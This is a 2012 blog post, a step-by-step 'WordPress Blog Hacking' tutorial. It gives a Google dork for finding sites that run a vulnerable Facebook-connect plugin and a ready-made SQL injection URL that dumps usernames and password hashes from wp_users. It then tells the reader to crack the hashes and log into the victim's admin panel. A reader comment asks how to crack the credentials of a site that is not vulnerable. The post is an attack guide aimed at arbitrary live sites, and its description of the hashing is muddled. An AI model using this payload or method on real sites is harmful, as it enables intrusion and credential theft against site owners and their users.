WordPress Blog Hacking and all

WordPress Blog Hacking
Thursday, May 31, 2012 at 6:12

Open Google.com and enter This Dork
inurl:”fbconnect_action=myhome”

You will find many sites, Select the site which you are comfortable with.

The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=

Now replace the ?fbconnect_action=myhome&userid= with

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users–

Now The URL will be Like this ..
http://www.site.com/?fbconnect_action=myhome&userid=
with this

http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users–
Now you have the User name and Password.

password is encrypted with WordPress md5 (blowfish). You need to decode this.

Then find the administrator panel out. Normally it should be in
http://www.victrimsite.com/wp-admin

or
http://www.victrimsite.com/wp-login.php

Advertisements

9 thoughts on “WordPress Blog Hacking and all

  1. Dear i found a word-press website which is not a vulnerbale site, if found the admin page easily but how can i crack the username and password??????

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s